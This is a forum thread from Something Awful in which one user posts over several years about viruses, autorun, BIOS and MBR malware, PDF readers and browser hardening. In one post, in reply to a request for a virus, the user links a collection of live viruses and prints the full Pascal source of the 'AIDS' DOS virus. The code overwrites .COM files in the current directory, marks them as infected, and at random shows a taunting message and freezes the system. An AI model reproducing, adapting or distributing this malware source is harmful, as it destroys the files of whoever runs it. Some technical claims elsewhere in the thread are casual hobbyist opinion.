Rootkit.KInject is a sexy new virus. Let's talk about notable viruses we have recently encountered

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > Rootkit.KInject is a sexy new virus. Let's talk about notable viruses we have recently encountered

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Otacon posted:

A while back I remember having a jpg file that instantly crashed explorer.exe when you viewed the folder it was contained in. If you put it on the desktop, it would crash explorer constantly. If you viewed it in any browser, it would instantly cause an overflow and your system would bluescreen unless you closed it through Procman. I wonder if I saved it...

EDIT Found it. It no longer crashes explorer, but it does cause iexplorer to jump to over 500mb RAM, and firefox to 791mb! Interesting.

I had a corrupted image in a folder full of images on an old hard drive that would crash explorer after a few minutes when explorer worked its way to the file to thumbnail it or something. Sounds like you had/have a similar thing.

# ¿ Dec 17, 2008 15:23

Adbot: ADBOT LOVES YOU

# ¿ May 17, 2024 14:26

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Autorun should have been disabled with Vista or maybe XP SP2 in my opinion.

It seems strange they plugged various holes, but never autorun.

# ¿ Dec 22, 2008 22:01

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

TheWevel posted:

Yeah that's weird, I'm on a completely clean machine and got the same result.

I believe their web server has been hijacked, and depending on the referrer information it will redirect you to the malware site. I know I've read of this elsewhere.

# ¿ Dec 23, 2008 02:03

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Hillridge posted:

Goddammit I am still getting redirected now and then when clinking links on a google search results page. I've run a few scans and found nothing. I guess I'll just live with it for now.

I'd advise alerting the owners of the sites that they may have been exploited, and posting what sites and search results are giving you redirects.

# ¿ Dec 24, 2008 18:11

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

ab0z posted:

Actually, it's best not to download stupid poo poo.
I could run NO antivirus software at all, because I don't download crap from limewarez or whatever.

You're precious, really.

I'd like you to think back to 2003 for why this is amusing.

# ¿ Jan 3, 2009 04:51

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

I dunno what's going on, I use AVG myself and it isn't giving me any warnings about any page of this thread. I did buy no-ads though.

# ¿ Feb 28, 2009 23:46

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Cojawfee posted:

Maybe I should just install the bare minimum XP and run everything inside a VM with most of my system resources allocated.

But then if that VM gets infected, all of your stuff is still screwed up.

# ¿ Mar 1, 2009 18:20

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Ensign Expendable posted:

Pre-SP3 machines can still have autorun disabled by downloading an update.

Or you could use any of a number of registry value tweakers.

# ¿ Apr 25, 2009 02:45

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

GREAT BOOK OF DICK posted:

I want this virus.

Couldn't find it, but here's a ton of old viruses: http://cd.textfiles.com/thegreatunsorted/live_viruses/

Who else misses nice simple viruses?

code:

�����������������������������������������������������������������������������Ŀ
� AIDS Pascal Source Code                                                     �
�������������������������������������������������������������������������������

{C-}
{U-}
{I-}       { Wont allow a user break, enable IO check }

{ -- Constants --------------------------------------- }

Const
     VirusSize = 13847;    { AIDS's code size }

     Warning   :String[42]     { Warning message }
     = 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations------------------------------------- }

Type
     DTARec    =Record      { Data area for file search }
     DOSnext  :Array[1..21] of Byte;
                   Attr    : Byte;
                   Ftime,
                   FDate,
                   FLsize,
                   FHsize  : Integer;
                   FullName: Array[1..13] of Char;
                 End;

Registers    = Record    {Register set used for file search }
   Case Byte of
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
   End;

{ -- Variables--------------------------------------------- }

Var
                               { Memory offset program code }
   ProgramStart : Byte absolute Cseg:$100;
                                          { Infected marker }
   MarkInfected : String[42] absolute Cseg:$180;
   Reg          : Registers;                 { Register set }
   DTA          : DTARec;                       { Data area }
   Buffer       : Array[Byte] of Byte;        { Data buffer }
   TestID       : String[42]; { To recognize infected files }
   UsePath      : String[66];        { Path to search files }
                                    { Lenght of search path }
   UsePathLenght: Byte absolute UsePath;
   Go           : File;                    { File to infect }
   B            : Byte;                              { Used }
   LoopVar      : Integer;  {Will loop forever}

{ -- Program code------------------------------------------ }

Begin
  GetDir(0, UsePath);               { get current directory }
  if Pos('\', UsePath) <> UsePathLenght then
    UsePath := UsePath + '\';
  UsePath := UsePath + '*.COM';        { Define search mask }
  Reg.AH := $1A;                            { Set data area }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;          { Set attribute to find ALL files }
  MsDos(Reg);                   { Find first matching entry }
  IF not Odd(Reg.Flags) Then         { If a file found then }
    Repeat
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
      Delete(UsePath, B, 255);             { Remove garbage }
      Assign(Go, UsePath);
      Reset(Go);
      If IOresult = 0 Then          { If not IO error then }
      Begin
        BlockRead(Go, Buffer, 2);
        Move(Buffer[$80], TestID, 43);
                      { Test if file already ill(Infected) }
        If TestID <> Warning Then        { If not then ... }
        Begin
          Seek (Go, 0);
                            { Mark file as infected and .. }
          MarkInfected := Warning;
                                               { Infect it }
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
          Close(Go);
          Halt;                   {.. and halt the program }
        End;
        Close(Go);
      End;
        { The file has already been infected, search next. }
      Reg.AH := $4F;
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
      MsDos(Reg);
    {  ......................Until no more files are found }
    Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
  Writeln('');                          {Give a lot of smiles}
Writeln('');
Writeln('     ');
Writeln('                                 ATTENTION:                             ');
Writeln('      I have been elected to inform you that throughout your process of ');
Writeln('      collecting and executing files, you have accidentally H��K�     ');
Writeln('      yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln('      be; YES, it CAN be, a ���s has infected your system. Now what do ');
Writeln('      you have to say about that? HAHAHAHA. Have H�� with this one and ');
Writeln('                       remember, there is NO cure for                   ');
Writeln('                                                                        ');
Writeln('         ����������     ������������    �����������      ����������     ');
Writeln('        ��۱��������     �����۱�����   �۱���������    ��۱��������    ');
Writeln('        �۱�      �۱        �۱        �۱       �۱   �۱�       ��   ');
Writeln('        �۱       �۱        �۱        �۱       �۱   �۱             ');
Writeln('        �����������۱        �۱        �۱       �۱   ������������    ');
Writeln('        �۱��������۱        �۱        �۱       �۱    ����������۱   ');
Writeln('        �۱       �۱        �۱        �۱       �۱             �۱   ');
Writeln('        �۱       �۱        �۱        �۱      ��۱   ��       ��۱   ');
Writeln('        �۱       �۱   ������������    ����������۱�    ���������۱�   ');
Writeln('         ��        ��    ������������    �����������      ����������    ');
Writeln('                                                                        ');
Writeln('     ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

# ¿ Apr 26, 2009 03:39

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Midelne posted:

Last time there was an extensive discussion about PDF exploits, someone got all snooty about not using Adobe Reader and it being a exploit-infested piece of trash. Unfortunately for their argument, it was the day after FoxIt fixed something like a dozen remote code execution vulnerabilities.

If you have software, there are bugs in it. If it's a widespread piece of software, people will attempt to find and exploit those vulnerabilities. The impact of those vulnerabilities -- at least from what I can see -- seems to depend much more on the security infrastructure of the operating system that you're running than the particular version or brand of the software you're using.

All of that said, without any in-depth technical knowledge on the subject I would assume that we're usually looking at Reader-specific exploits when we read about PDF exploits. There are a slew of FoxIt-specific, no doubt, but Reader has achieved market saturation and is a much larger target.

Personally, I prefer using PDF-Xchange Viewer for a PDF reader and simple editor. It's free, has a lot of features that Foxit has started charging for, and has had little to no security exploits discovered. It also loads fast.

# ¿ Jun 29, 2009 18:41

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Suspicious posted:

http://en.wikipedia.org/wiki/Comic_Sans

The guy made it for children cartoon speech bubbles in MS Bob. It's not his fault every idiot on the planet adopted it as a general use font.

I would rather see every font in the world replaced with comic sans than see another thing that uses Papyrus. At least Comic Sans is legible, if informal.

# ¿ Sep 5, 2009 20:25

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

thelightguy posted:

There aren't any BIOS level viruses for the x86 platform

Yes there are, but they're very hard to catch and when they activate they tend to just silently wipe the bios during regular usage.

# ¿ Sep 9, 2009 07:28

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

thelightguy posted:

Not saying I doubt you or anything, but there are so many inconsistencies between BIOSes that it would be impossible to write something that would target more than a relatively small number of systems, since you'd need a different binary image for each motherboard. The Amiga, because of its more standardized architecture had so-called restart proof viruses, which were more or less BIOS level, but not the PC.

The ones I remember seeing tended to target various popular gamer motherboards. It's surprising how popular certain boards would be, but the PC BIOS virus/wiper thing seems to have died off these days, probably because by 2002 or so a lot of motherboard producers that sold primarily to people building stuff themselves started putting anti-BIOS virus stuff in their systems. I have a couple of noname boxes from 2002 or so that a gamer friend of mine gave to me that have "BIOS VIRUS GUARD" which basically locks down the flashing ability on every bootso the only way to flash it is to reboot while holding certain keys down.

# ¿ Sep 9, 2009 19:02

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

CraigK posted:

I'm just waiting for viruses that can survive a format c:\ *.* /y.

So any virus that is on A, B, or D-Z? :v:

# ¿ Nov 23, 2009 05:12

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Ensign Expendable posted:

Well, IE killed browser sales, maybe they're trying to kill antivirus sales?

They're trying to kill lovely "free" antivirus. Their attempt to kill paid antivirus ended back in summer when OneCare was canceled.

# ¿ Dec 9, 2009 04:22

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

COCKMOUTH.GIF posted:

Outside of a corporate environment, I'm at the point now where if I have to fix someone's computer, I'll clean out the infection and force Google Chrome upon them. Uninstall all Java and Adobe Flash crap, maybe leave the Adobe Reader in there. Chrome can handle pretty much all of that natively so it helps close massive security holes. No product is bulletproof, but I believe forcing people to use Chrome and MSE will help mitigate many disasters once the other products are uninstalled. Obviously this won't work in an enterprise/corporate environment because of the need for Internet Explorer, AD, etc.

It also helps to install an ad-blocking extension for Chrome and teach people how to practice safe computing to an extent. People have been asking me lately about alternatives to LimeWire and I typically tell them to just loving pay for the poo poo. It's not worth the aggravation trying random file-sharing programs/websites and hoping you won't infect yourself.

For what it's worth, Firefox 5 will have a mainstream 64 bit version, and that will be inherently more secure than Chrome which is still 32 bit. Vastly improved Address Space Layout Randomization and so on make 64 bit Windows programs much harder to gently caress with and 64 bit Java and Flash are out and both seem to have much fewer holes as well.

It's a shame that Microsoft doesn't let you force 64 bit IE8/9 to be the default broswer though, even that is a shitload more secure, plus the "no tacking" system in 9 is also a quite viable adblock/malware site block system.

# ¿ Mar 15, 2011 20:27

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

Factory Factory posted:

The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

Infected MBR was a common feature with a ton of viruses throughout the 90s and early 2000s.

# ¿ Mar 20, 2011 06:37

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

It's fairly trivial to write malware for old old IBM PCs that would tell the hard drive head to repeatedly seek between certain invalid sectors until the arm was stuck and the drive rendered useless.

# ¿ May 18, 2011 03:52

Adbot: ADBOT LOVES YOU

# ¿ May 17, 2024 14:26

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

FCKGW posted:

Yeah, malware kits have been around on the Windows side for a while, but this new Mac Defender is from the first kit written for OSX.

I think you probably mean the first publicly available kit. The first Windows kits were kept private and unknown before the first publicly known ones came out.

# ¿ May 26, 2011 03:07

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > Rootkit.KInject is a sexy new virus. Let's talk about notable viruses we have recently encountered